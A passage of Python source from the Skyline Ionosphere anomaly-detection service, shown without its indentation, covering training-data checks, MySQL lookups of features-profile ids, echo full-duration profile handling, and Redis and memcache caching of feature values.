logger.error('error ::ionosphere_learn check could not determine the metric max_generations from the metrics_db_object for %s' % base_name)
if not metric_max_generations:
logger.error('error ::ionosphere_learn check cannot continue without max_generations for %s' % base_name)
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# The Redis ionosphere.ionosphere_non_smtp_alerter_metrics list is created here to
# replace the self.ionosphere_non_smtp_alerter_metrics Manager.list in the below
# section
ionosphere_non_smtp_alerter_metrics = []
try:
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# ionosphere_non_smtp_alerter_metrics = list(self.redis_conn.smembers('ionosphere.ionosphere_non_smtp_alerter_metrics'))
ionosphere_non_smtp_alerter_metrics = list(self.redis_conn_decoded.smembers('ionosphere.ionosphere_non_smtp_alerter_metrics'))
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to generate a list from the ionosphere.ionosphere_non_smtp_alerter_metrics Redis set')
ionosphere_non_smtp_alerter_metrics = []
# @added 20170108 - Feature #1830: Ionosphere alerts
# Only process smtp_alerter_metrics
if training_metric:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# if base_name in self.ionosphere_non_smtp_alerter_metrics:
if base_name in ionosphere_non_smtp_alerter_metrics:
# @modified 20191114 - Feature #: forward_alert
# Allow ionosphere to check any metrics that have an alerter other than smtp set, apart from syslog
# logger.error('error :: Ionosphere does not handle metrics that do not have a smtp alert context removing check for %s' % (base_name))
logger.info('Ionosphere does not handle metrics that do not have a smtp alert context removing check for %s which is a training_metric' % (base_name))
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
else:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# self.training_metrics.append(base_name)
redis_set = 'ionosphere.training_metrics'
data = str(base_name)
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
logger.info(
'ionosphere_enabled is %s for metric id %s - %s' % (
str(metric_ionosphere_enabled), str(metrics_id),
base_name))
if training_metric:
logger.info('Ionosphere is not enabled on %s' % (base_name))
else:
logger.info('Ionosphere is enabled on %s' % (base_name))
# @added 20161210 - Branch #922: ionosphere
# Task #1658: Patterning Skyline Ionosphere
# Only continue if there is a training data json timeseries file
metric_timeseries_dir = base_name.replace('.', '/')
# @modified 20170115 - Feature #1854: Ionosphere learn
# Allowing the bifurcation of the metric_training_data_dir based on
# whether added_by is ionosphere_learn or not, this allows Ionosphere to
# be brought online to start evaluating the learn features profiles at
# 30 days or whatever the learn_full_duration_days is for the metric
# that is being automatically learnt uses these fuller duration features
# to determine if a new training data set has been created for an
# ionosphere_enabled metric. Here Ionosphere starts to try and get
# clever, let us hope not too clever, but this is where the
# max_percent_diff_from_origin and max_generations comes in. So ...
# here we go, a really "Crazy feedback loop" @astanway :) I would say
# that this is going to be way more useful than the last referenced one
# in https://github.com/etsy/skyline/pull/90#r13592782 ;) This is it
# 20170115202500 UTC Ionosphere really is now really going to begin.
# Here we go! Learn!
# metric_training_data_dir = '%s/%s/%s' % (
# settings.IONOSPHERE_DATA_FOLDER, metric_timestamp,
# metric_timeseries_dir)
if added_by != 'ionosphere_learn':
metric_training_data_dir = '%s/%s/%s' % (
settings.IONOSPHERE_DATA_FOLDER, metric_timestamp,
metric_timeseries_dir)
else:
# Here we go! Learn you bugger! SUCH A BIG THANKS TO tsfresh!
# And flowjob and The White Stripes, @matzhouse, her and the Dude.
metric_training_data_dir = '%s/%s/%s' % (
settings.IONOSPHERE_LEARN_FOLDER, metric_timestamp,
metric_timeseries_dir)
anomaly_json = '%s/%s.json' % (metric_training_data_dir, base_name)
if os.path.isfile(anomaly_json):
logger.info('training data ts json available - %s' % (anomaly_json))
else:
logger.error('error :: training data ts json was not found - %s' % (anomaly_json))
# @added 20200908 - Feature #3734: waterfall alerts
# Return to sender to alert
if added_by != 'ionosphere_learn':
remove_waterfall_alert(added_by, metric_timestamp, base_name)
logger.info('sending %s back to %s to alert' % (base_name, added_by))
# @added 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
# so this needs to be sent to Ionosphere so Ionosphere
# can send it back on an alert.
return_to_sender_to_alert(added_by, metric_timestamp, base_name, anomalous_value, triggered_algorithms, full_duration, algorithms_run)
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
# @added 20161228 - Feature #1828: ionosphere - mirage Redis data features
# The timeseries full_duration needs to be recorded to allow Mirage metrics to
# be profiled on Redis timeseries data at FULL_DURATION
# e.g. mirage.redis.24h.json
if training_metric:
logger.info('training metric - %s' % (base_name))
redis_anomaly_json = False
if added_by == 'mirage':
logger.info('checking training data Redis json is available')
# Always calculate features for both the SECOND_ORDER_RESOLUTION_SECONDS
# timeseries data and the FULL_DURATION Redis timeseries data.
# It is always preferable to create a features profile on a FULL_DURATION
# data set, unless the user is flagging the actual Mirage timeseries as
# not anomalous. In the Mirage context the not anomalous may often be more
# "visibile" in the FULL_DURATION view and if so should be matched on the
# FULL_DURATION timeseries data, even if it is a Mirage metric.
# Features profiles can be created for a Mirage metric on both the
# FULL_DURATION and the SECOND_ORDER_RESOLUTION_SECONDS data sets, however
# only one should be needed.
# A features profile should always be created at the highest resolution
# possible, FULL_DURATION data, wherever possible.
try:
full_duration_hours = str(int(settings.FULL_DURATION / 3600))
redis_anomaly_json = '%s/%s.mirage.redis.%sh.json' % (metric_training_data_dir, base_name, full_duration_hours)
if os.path.isfile(redis_anomaly_json):
logger.info('training data Redis full duration ts json available - %s' % (redis_anomaly_json))
else:
logger.info('no training data Redis full duration json was not found - %s' % (redis_anomaly_json))
except:
logger.error(traceback.format_exc())
logger.error('error :: training data Redis full duration json was not found - %s' % (redis_anomaly_json))
# @added 20161209 - Branch #922: ionosphere
# Task #1658: Patterning Skyline Ionosphere
# Use SQLAlchemy, mysql.connector is still upstairs ^^ but starting the
# move to SQLAlchemy now that all the webapp Ionosphere SQLAlchemy
# patterns work and the database lay out if defined we can begin on the
# data side. Ionosphere was put together backwards, like tsfresh was
# learnt. It was the people input first here in many ways, which is
# exactly how it was suppose to be.
# This is now the Ionosphere meat.
# Get a MySQL engine only if not training_metric
if not training_metric:
if not metrics_id:
logger.error('error :: metric id not known')
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return False
# @added 20170101 - Feature #1836: ionosphere - local features profiles disk cache
# Cache fp ids for 300 seconds?
# @added 20170804 - Bug #2130: MySQL - Aborted_clients
# Set a conditional here to only get_an_engine if no engine, this
# is probably responsible for the Aborted_clients, as it would have
# left the accquired engine orphaned
# Testing on skyline-dev-3-40g-gra1 Fri Aug 4 16:08:14 UTC 2017
if not engine:
logger.info('getting MySQL engine')
try:
engine, log_msg, trace = get_an_engine()
logger.info(log_msg)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine to get fp_ids')
if not engine:
logger.error('error :: engine not obtained to get fp_ids')
try:
ionosphere_table, log_msg, trace = ionosphere_table_meta(skyline_app, engine)
logger.info(log_msg)
logger.info('ionosphere_table OK')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get ionosphere_table meta for %s' % base_name)
# Determine the fp_ids that exist for the metric
fp_ids = []
fp_ids_found = False
# @added 20170108 - Feature #1842: Ionosphere - Graphite now graphs
# Added all_fp_ids so that we can handle multiple durations and not
# error and reminds me of the needed metrics by FULL_DURATION
# ionosphere.analyzer.unique_metrics (at FULL_DURATION)
# ionosphere.mirage.unique_metrics (NOT at FULL_DURATION)
all_fp_ids = []
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# Create the fp_ids_db_object so it is available to determine all
# the details of all features profiles for the metric, this has all
# the generations values avaialble in it.
# Here we go! Learn!
# @modified 20170308 - Feature #1960: ionosphere_layers
# Not currently used - fp_ids_db_object
# fp_ids_db_object = None
# @added 20170306 - Feature #1960: ionosphere_layers
# Here we go, let us TEACH you properly.
# Set result to None here to fix a interpolation error below
result = None
fp_layers_ids = []
fp_layers_present = False
# @added 20190326 - Feature #2484: FULL_DURATION feature profiles
# After the features profile evaluations this fps_db_object will
# be used to determine what settings.FULL_DURATION features
# profiles need to be created for ionosphere_echo
fps_db_object = None
# @added 20190919 - Feature #2484: FULL_DURATION feature profiles
# Set both fp_count_with_echo and fp_count to 0 initially so that
# if the are echo fps, then the database can be updated with the
# fp_count_with_echo value for fp_count in the ionosphere_matched
# table
fp_count = 0
fp_count_with_echo = 0
try:
connection = engine.connect()
# @modified 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
# Order by the latest features profile, this also results in the
# layers ids being ordered by latest too.
# stmt = select([ionosphere_table]).where(ionosphere_table.c.metric_id == metrics_id)
stmt = select([ionosphere_table]).where(ionosphere_table.c.metric_id == metrics_id).order_by(desc(ionosphere_table.c.id))
result = connection.execute(stmt)
# @added 20190326 - Feature #2484: FULL_DURATION feature profiles
# To be used for ionosphere_echo
fps_db_object = [{column: value for column, value in rowproxy.items()} for rowproxy in result]
# for row in result:
for row in fps_db_object:
if row['enabled'] != 1:
continue
if row['deleted'] == 1:
continue
fp_id = row['id']
# @added 20170306 - Feature #1960: ionosphere_layers
# Here we go, let us TEACH you properly
fp_layers_id = int(row['layers_id'])
if fp_layers_id > 0:
fp_layers_present = True
# @modified 20181013 - Feature #2430: Ionosphere validate learnt features profiles page
# Only add the fp_layers_id if > 0
# fp_layers_ids.append(fp_layers_id)
if fp_layers_id > 0:
if fp_layers_id not in fp_layers_ids:
fp_layers_ids.append(fp_layers_id)
# @added 20170108 - Feature #1842: Ionosphere - Graphite now graphs
# Added all_fp_ids
all_fp_ids.append(int(fp_id))
if int(row['full_duration']) == int(full_duration):
# @modified 20170116 - Feature #1854: Ionosphere learn - generations
# Handle ionosphere_learn
if added_by != 'ionosphere_learn':
fp_ids.append(int(fp_id))
logger.info('using fp id %s matched full_duration %s - %s' % (str(fp_id), str(full_duration), base_name))
else:
# @added 20170116 - Feature #1854: Ionosphere learn - generations
# If this is added_by ionosphere_learn the id is only
# added if the use_full_duration_days features profile
# is less than max_generations as if it is at the max
# then a new features profile cannot be created from it
# even if it is were to match. Ionosphere learn is
# limited here on generation.
# Set the default as max e.g. not allowed
current_fp_generation = int(metric_max_generations)
try:
current_fp_generation = row['generation']
if int(current_fp_generation) < int(metric_max_generations):
fp_ids.append(int(fp_id))
logger.info(
'valid ionosphere_learn generation %s - fp id %s matched full_duration %s - %s' % (
str(current_fp_generation), str(fp_id),
str(full_duration), base_name))
else:
logger.info(
'ionosphere_learn cannot check due to max_generations of %s would be exceeded, current generation %s - fp id %s matched full_duration %s - %s' % (
str(metric_max_generations), str(current_fp_generation), str(fp_id),
str(full_duration), base_name))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: ionosphere_learn check could not determine the fp generation of fp id %s from the row object for %s' % (
str(fp_id), base_name))
else:
# @modified 20200717 - Bug #3382: Prevent ionosphere.learn loop edge cases
# Added the fp full_duration for clarity sake
# logger.info('not using fp id %s not matched full_duration %s - %s' % (str(fp_id), str(full_duration), base_name))
logger.info('not using fp id %s of full_duration %s as does not match full_duration %s - %s' % (
str(fp_id), str(row['full_duration']), str(full_duration), base_name))
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# Create the fp_ids_db_object so it is available throughout
# Here we go! Learn!
# @modified 20170308 - Feature #1960: ionosphere_layers
# Not currently used - fp_ids_db_object
# fp_ids_db_object = row
connection.close()
fp_count = len(fp_ids)
logger.info('determined %s fp ids for %s' % (str(fp_count), base_name))
# @added 20170309 - Feature #1960: ionosphere_layers
fp_layers_count = len(fp_layers_ids)
logger.info('determined %s layers ids for %s' % (str(fp_layers_count), base_name))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine fp ids from DB for %s' % base_name)
fp_count = 0
# @added 20170309 - Feature #1960: ionosphere_layers
fp_layers_count = 0
# @added 20170306 - Feature #1960: ionosphere_layers
# Corrected the interpolation of the fp_ids_db_object above where it
# was set to the last row only, however it was not used anyway.
# Here we go, let us TEACH you properly. We only evaluate
# @modified 20170308 - Feature #1960: ionosphere_layers
# Not currently used - fp_ids_db_object
# if result:
# fp_ids_db_object = result
if len(fp_ids) == 0:
logger.info('there are no fp ids that match full duration for %s' % base_name)
# @added 20200908 - Feature #3734: waterfall alerts
# If any layers are found but any fps for analysis have been
# discarded because of echo rate limiting or they do not match
# the fulll duration, still check any enabed layers
if fp_layers_count:
logger.info('there are %s fp layers for %s' % (str(fp_layers_count), base_name))
fp_ids_found = True
else:
fp_ids_found = True
if not fp_ids_found:
logger.info('no fp ids were found for %s at %s' % (base_name, str(full_duration)))
# @modified 20170108 - Feature #1842: Ionosphere - Graphite now graphs
# Use all_fp_ids so that we can handle multiple durations
# fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if len(all_fp_ids) == 0:
logger.error('error :: Ionosphere is enabled on %s but has no feature_profiles' % (base_name))
# @added 20200516 - Bug #3546: Change ionosphere_enabled if all features profiles are disabled
# If there are no features profiles enabled for the metric
# send it back to the source to alert and update the DB with
# ionosphere_enabled=0, it has been willy nillied, all its
# fps have been disabled. This has the ramification that
# any layers the metric has will be disabled as well
if added_by != 'ionosphere_learn':
logger.info('%s has been willy nillied, all its features profiles have been disabled, but it is still flagged as ionosphere_enabled' % (base_name))
logger.info('sending %s back to %s to alert' % (base_name, added_by))
# @modified 20200908 - Feature #3734: waterfall alerts
# Use common return_to_sender_to_alert function
# cache_key = 'ionosphere.%s.alert.%s.%s' % (added_by, metric_timestamp, base_name)
# cache_key_value = [float(anomalous_value), base_name, int(metric_timestamp), triggered_algorithms, full_duration]
# try:
# self.redis_conn.setex(cache_key, 300, str(cache_key_value))
# logger.info('added Redis alert key - %s - %s' % (
# cache_key, str(cache_key_value)))
# except:
# logger.error(traceback.format_exc())
# logger.error(
# 'error :: failed to add Redis key - %s - [%s, \'%s\', %s, %s, %s]' %
# (cache_key, str(anomalous_value), base_name, str(int(metric_timestamp)),
# str(triggered_algorithms), str(full_duration)))
remove_waterfall_alert(added_by, metric_timestamp, base_name)
# @modified 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
# so this needs to be sent to Ionosphere so Ionosphere
# can send it back on an alert.
return_to_sender_to_alert(added_by, metric_timestamp, base_name, anomalous_value, triggered_algorithms, full_duration, algorithms_run)
# Update DB as to the fact that the metric is an ionosphere
# metric, all its fps have been disabled, it has been willy
# nillied
try:
metrics_table, log_msg, trace = metrics_table_meta(skyline_app, engine)
logger.info(log_msg)
logger.info('ionosphere_table OK')
connection = engine.connect()
connection.execute(
metrics_table.update(
metrics_table.c.id == metrics_id).
values(ionosphere_enabled=0))
connection.close()
logger.info('updated %s to ionosphere_enabled=0' % (
base_name))
logger.info('%s has been unwilly nillied' % (base_name))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not update matched_count and last_matched for %s ' % str(fp_id))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
else:
self.remove_metric_check_file(str(metric_check_file))
# @added 20200908 - Feature #3734: waterfall alerts
# Return to sender to alert
if added_by != 'ionosphere_learn':
remove_waterfall_alert(added_by, metric_timestamp, base_name)
logger.info('sending %s back to %s to alert' % (base_name, added_by))
# @added 20200930 - Feature #3734: waterfall alerts
# Send to Panorama as Mirage and Analyzer will not.
# @modified 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
# so this needs to be sent to Ionosphere so Ionosphere
# can send it back on an alert.
return_to_sender_to_alert(added_by, metric_timestamp, base_name, anomalous_value, triggered_algorithms, full_duration, algorithms_run)
if engine:
engine_disposal(engine)
return
# @added 20161221 - TODO: why not calculate the features of every
# anomaly so the the use does not have to do it and wait for the
# features to be calculated.
# Check the features were calculated by the webapp
calculated_feature_file = '%s/%s.tsfresh.input.csv.features.transposed.csv' % (metric_training_data_dir, base_name)
calculated_feature_file_found = False
if os.path.isfile(calculated_feature_file):
logger.info('calculated features available - %s' % (calculated_feature_file))
calculated_feature_file_found = True
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# ionosphere_learn should always provide the features profile csv
# Ionosphere does not create features profiles for learn, it only
# checks them.
# Here we go! Learn!
if added_by == 'ionosphere_learn':
if not calculated_feature_file_found:
logger.error('error :: no ionosphere_learn calculated_feature_file file found - %s' % calculated_feature_file)
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
if not calculated_feature_file_found:
if training_metric:
# Allow Graphite resources to be created if they are not an alert
# was not sent therefore features do not need to be calculated
check_time = int(time())
check_age = check_time - int(added_at)
if check_age < 5:
sleep(5)
graphite_file_count = len([f for f in os.listdir(metric_training_data_dir)
if f.endswith('.png') and
os.path.isfile(os.path.join(metric_training_data_dir, f))])
if graphite_file_count == 0:
logger.info('not calculating features no anomaly Graphite alert resources created in %s' % (metric_training_data_dir))
self.remove_metric_check_file(str(metric_check_file))
# @added 20200908 - Feature #3734: waterfall alerts
# Return to sender to alert
if added_by != 'ionosphere_learn':
remove_waterfall_alert(added_by, metric_timestamp, base_name)
logger.info('sending %s back to %s to alert' % (base_name, added_by))
# @modified 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
# so this needs to be sent to Ionosphere so Ionosphere
# can send it back on an alert.
return_to_sender_to_alert(added_by, metric_timestamp, base_name, anomalous_value, triggered_algorithms, full_duration, algorithms_run)
if engine:
engine_disposal(engine)
return
else:
logger.info('anomaly Graphite alert resources found in %s' % (metric_training_data_dir))
context = skyline_app
f_calc = None
if not calculated_feature_file_found:
try:
fp_csv, successful, fp_exists, fp_id, log_msg, traceback_format_exc, f_calc = calculate_features_profile(skyline_app, metric_timestamp, base_name, context)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to calculate features')
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
if os.path.isfile(calculated_feature_file):
logger.info('calculated features available - %s' % (calculated_feature_file))
calculated_feature_file_found = True
if f_calc:
send_metric_name = '%s.features_calculation_time' % skyline_app_graphite_namespace
f_calc_time = '%.2f' % float(f_calc)
try:
send_graphite_metric(skyline_app, send_metric_name, f_calc_time)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to send calculate features')
if training_metric:
logger.info('training metric done')
# @added 20200908 -
remove_waterfall_alert(added_by, metric_timestamp, base_name)
self.remove_metric_check_file(str(metric_check_file))
# TODO: make ionosphere more useful, compare any other
# available training_metric profiles here and match, not in the
# db context, in the training context.
if engine:
engine_disposal(engine)
return
if not calculated_feature_file_found:
logger.error('error :: calculated features file not available - %s' % (calculated_feature_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
# @modified 20161213 - Branch #1790: test_tsfresh
# TODO: Match the test_tsfresh method
# Create an array of the calculated features
calculated_features = []
if calculated_feature_file_found:
calculated_features = get_calculated_features(calculated_feature_file)
if len(calculated_features) == 0:
logger.error('error :: no calculated features were determined from - %s' % (calculated_feature_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
else:
logger.info('%s calculated features determined' % (str(len(calculated_feature_file))))
# @added 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
fp_checked = 0
# @modified 20181014 - Feature #2430: Ionosphere validate learnt features profiles page
# layers_checked = 0
layers_checked_count = 0
# @added 20190314 - Feature #2484: FULL_DURATION feature profiles
# Here we add the bifurcation to also create a features
# profile at FULL_DURATION for all Mirage metrics. With a
# view to increase the number of matches trained metric
# achieve by also allowing for the creation and comparing of
# the FULL_DURATION features profiles as well.
echo_check = False
echo_calculated_feature_file = False
echo_calculated_feature_file_found = False
echo_calculated_features = []
echo_fp_ids = []
echo_anomalous_timeseries = None
if added_by == 'mirage':
try:
echo_enabled = settings.IONOSPHERE_ECHO_ENABLED
except:
echo_enabled = False
if echo_enabled:
echo_check = True
# @added 20200714 - Bug #3644: Do not apply ionosphere_busy to batch processing metrics
# Feature #3480: batch_processing
# Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# In the batch processing context do not apply the alternation between
# normal Ionosphere Mirage features profile checks and Ionosphere echo
# features profile checks when ionosphere_busy is set to True as it
# results in false positives on batch processing metrics where one check
# matches and the next does not, then the next does.
batch_metric = False
if echo_check and BATCH_PROCESSING:
# Batch processing metric
try:
batch_metric = is_batch_metric(skyline_app, base_name)
except:
batch_metric = False
if batch_metric and ionosphere_busy:
ionosphere_busy = False
logger.info('batch processing metric, ionosphere_busy has been changed from True to False to prevent switching between Mirage and echo fps')
# @added 20190403 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# If there are more than 4 metric check files, alternate between normal
# Ionosphere Mirage features profile checks and Ionosphere echo features
# profile checks.
if echo_check:
if ionosphere_busy:
# Check the ionosphere_echo metric Redis keys to see which check
# to run, ionosphere or ionosphere_echo. If Ionosphere is busy,
# Ionosphere will alternate between normal Ionosphere features
# profiles (Mirage duration) and Ionosphere echo features
# profiles (FULL_DURATION) comparison.
echo_ionosphere_check_cache_key = 'ionosphere_echo.ionosphere.check.%s' % base_name
echo_ionosphere_check_key = False
try:
echo_ionosphere_check_key = self.redis_conn.get(echo_ionosphere_check_cache_key)
except Exception as e:
logger.error('error :: could not query Redis for cache_key: %s' % e)
echo_ionosphere_echo_check_cache_key = 'ionosphere_echo.echo.check.%s' % base_name
echo_ionosphere_echo_check_key = False
try:
echo_ionosphere_echo_check_key = self.redis_conn.get(echo_ionosphere_echo_check_cache_key)
except Exception as e:
logger.error('error :: could not query Redis for cache_key: %s' % e)
create_ionosphere_echo_check_key = False
remove_ionosphere_echo_check_key = False
# If neither the ionosphere or the ionosphere_echo key exist do
# only check ionosphere
if not echo_ionosphere_check_key:
if not echo_ionosphere_echo_check_key:
echo_check = False
logger.info('ionosphere_busy - only running normal Mirage feature profiles checks, skipping ionosphere_echo checks')
create_ionosphere_echo_check_key = echo_ionosphere_check_cache_key
# If the ionosphere_echo key exists only check ionosphere
if echo_ionosphere_echo_check_key:
echo_check = False
logger.info('ionosphere_busy - only running normal Mirage feature profiles checks, skipping ionosphere_echo checks')
create_ionosphere_echo_check_key = echo_ionosphere_check_cache_key
remove_ionosphere_echo_check_key = echo_ionosphere_echo_check_cache_key
# If ionosphere_echo key exists only check ionosphere
if echo_ionosphere_check_key:
echo_check = True
logger.info('ionosphere_busy - skipping the normal Mirage feature profiles checks as run last time and running ionosphere_echo checks this time')
# Remove the Mirage features profiles from the
fp_ids = []
logger.info('ionosphere_busy - removed %s Mirage feature profile ids from fp_ids' % str(fp_count))
create_ionosphere_echo_check_key = echo_ionosphere_echo_check_cache_key
remove_ionosphere_echo_check_key = echo_ionosphere_check_cache_key
if remove_ionosphere_echo_check_key:
try:
self.redis_conn.delete(remove_ionosphere_echo_check_key)
logger.info(
'deleted Redis check key - %s' % (remove_ionosphere_echo_check_key))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed to delete Redis check key - %s' % (remove_ionosphere_echo_check_key))
if create_ionosphere_echo_check_key:
try:
key_created_at = int(time())
self.redis_conn.setex(
# @modified 20190412 - Task #2824: Test redis-py upgrade
# Task #2926: Update dependencies
# create_ionosphere_echo_check_key, 300, [key_created_at])
create_ionosphere_echo_check_key, 300, key_created_at)
logger.info(
'created Redis check key - %s' % (create_ionosphere_echo_check_key))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed to create Redis check key - %s' % (create_ionosphere_echo_check_key))
if echo_check:
try:
if fps_db_object:
for row in fps_db_object:
# @added 20201009 - Bug #3782: Exclude disabled echo features profile
if row['enabled'] != 1:
continue
if row['deleted'] == 1:
continue
if int(row['full_duration']) == int(settings.FULL_DURATION):
fp_ids.append(int(row['id']))
echo_fp_ids.append(int(row['id']))
logger.info('appending ionosphere_echo fp id %s matched full_duration of %s - %s' % (str(row['id']), str(settings.FULL_DURATION), base_name))
fp_count_with_echo = len(fp_ids)
echo_fp_count = len(echo_fp_ids)
if echo_fp_count == 0:
echo_check = False
if echo_fp_count > 0:
logger.info('added an additional %s echo fp ids for %s' % (str(echo_fp_count), base_name))
logger.info('determined a total of %s fp ids (incl. echo) for %s' % (str(fp_count_with_echo), base_name))
echo_calculated_feature_file = '%s/%s.echo.tsfresh.input.csv.features.transposed.csv' % (metric_training_data_dir, base_name)
if os.path.isfile(echo_calculated_feature_file):
logger.info('echo calculated features available - %s' % (echo_calculated_feature_file))
echo_calculated_feature_file_found = True
else:
use_context = 'ionosphere_echo_check'
f_calc = None
try:
fp_csv, successful, fp_exists, fp_id, log_msg, traceback_format_exc, f_calc = calculate_features_profile(skyline_app, metric_timestamp, base_name, use_context)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to calculate features')
if os.path.isfile(echo_calculated_feature_file):
logger.info('echo calculated features available - %s' % (echo_calculated_feature_file))
echo_calculated_feature_file_found = True
echo_calculated_features = []
if echo_calculated_feature_file_found:
try:
echo_calculated_features = get_calculated_features(echo_calculated_feature_file)
except:
# 20190412 - just for debug
logger.error(traceback.format_exc())
logger.error('error :: ionosphere_echo_check no echo_calculated_features were determined')
echo_calculated_features = False
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to process echo')
# Compare calculated features to feature values for each fp id
not_anomalous = False
if calculated_feature_file_found:
for fp_id in fp_ids:
if not metrics_id:
logger.error('error :: metric id not known')
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return False
# @added 20190404 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# If the Ionosphere features profile checks are approaching the
# ionosphere_max_runtime, skip the remaining checks.
time_now_check = int(time())
# Allow 5 seconds for layers checks to be done
max_runtime_tolereance = ionosphere_max_runtime - 5
running_for = time_now_check - check_process_start
if running_for >= max_runtime_tolereance:
logger.info('features profile checks have been running for %s seconds, the ionosphere_max_runtime is about to be breached, skipping remaining features profile checks' % str(running_for))
break
# @added 20190327 - Feature #2484: FULL_DURATION feature profiles
check_type = 'ionosphere'
if echo_check:
for echo_fp_id in echo_fp_ids:
if fp_id == echo_fp_id:
check_type = 'ionosphere_echo_check'
if check_type == 'ionosphere_echo_check':
if not echo_calculated_features:
continue
# @added 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
fp_checked += 1
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis set instead of Manager().list to reduce memory
# self.features_profiles_checked.append(fp_id)
redis_set = 'ionosphere.features_profiles_checked'
data = str(fp_id)
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
features_count = None
fp_features = []
# Get features for fp_id from z_fp_<metric_id> table where the
# features profile is the same full_duration
metric_fp_table = 'z_fp_%s' % str(metrics_id)
# @added 20170804 - Bug #2130: MySQL - Aborted_clients
# Set a conditional here to only get_an_engine if no engine, this
# is probably responsible for the Aborted_clients, as it would have
# left the accquired engine orphaned
# Testing on skyline-dev-3-40g-gra1 Fri Aug 4 16:08:14 UTC 2017
if not engine:
try:
engine, log_msg, trace = get_an_engine()
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine for feature_id and values from %s' % metric_fp_table)
if not engine:
logger.error('error :: engine not obtained for feature_id and values from %s' % metric_fp_table)
# @added 20170809 - Task #2132: Optimise Ionosphere DB usage
# First check to determine if the fp_id has data in memcache
# before querying the database
fp_id_feature_values = None
if settings.MEMCACHE_ENABLED:
fp_id_feature_values_key = 'fp.id.%s.feature.values' % str(fp_id)
try:
# @modified 20191029 - Task #3304: py3 - handle pymemcache bytes not str
# fp_id_feature_values = self.memcache_client.get(fp_id_feature_values_key)
if python_version == 2:
fp_id_feature_values = self.memcache_client.get(fp_id_feature_values_key)
else:
fp_id_feature_values = self.memcache_client.get(fp_id_feature_values_key).decode('utf-8')
# if memcache does not have the key the response to the
# client is None, it does not except
except:
# @modified 20200501 - Branch #3262: py3
# This is not an error if the data does not exist in
# memcache, it can be expected not to exists in
# memcache if it has not be used in a while.
# logger.error('error :: failed to get %s from memcache' % fp_id_feature_values_key)
logger.info('did not get %s from memcache, will query DB' % fp_id_feature_values_key)
try:
self.memcache_client.close()
except:
# @modified 20170913 - Task #2160: Test skyline with bandit
# pass
logger.error('error :: failed to close memcache_client')
if fp_id_feature_values:
fp_features = literal_eval(fp_id_feature_values)
logger.info('using memcache %s key data' % fp_id_feature_values_key)
if not fp_features:
try:
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
stmt = 'SELECT feature_id, value FROM %s WHERE fp_id=%s' % (metric_fp_table, str(fp_id)) # nosec
connection = engine.connect()
for row in engine.execute(stmt):
fp_feature_id = int(row['feature_id'])
fp_value = float(row['value'])
fp_features.append([fp_feature_id, fp_value])
connection.close()
features_count = len(fp_features)
logger.info('determined %s features for fp_id %s' % (str(features_count), str(fp_id)))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine feature_id, value from %s' % metric_fp_table)
if fp_features and settings.MEMCACHE_ENABLED:
fp_id_feature_values_key = 'fp.id.%s.feature.values' % str(fp_id)
try:
self.memcache_client.set(fp_id_feature_values_key, fp_features)
logger.info('populated memcache %s key' % fp_id_feature_values_key)
except:
logger.error('error :: failed to set %s in memcache' % fp_id_feature_values_key)
# @added 20170809 - Task #2132: Optimise Ionosphere DB usage
if settings.MEMCACHE_ENABLED:
try:
self.memcache_client.close()
except:
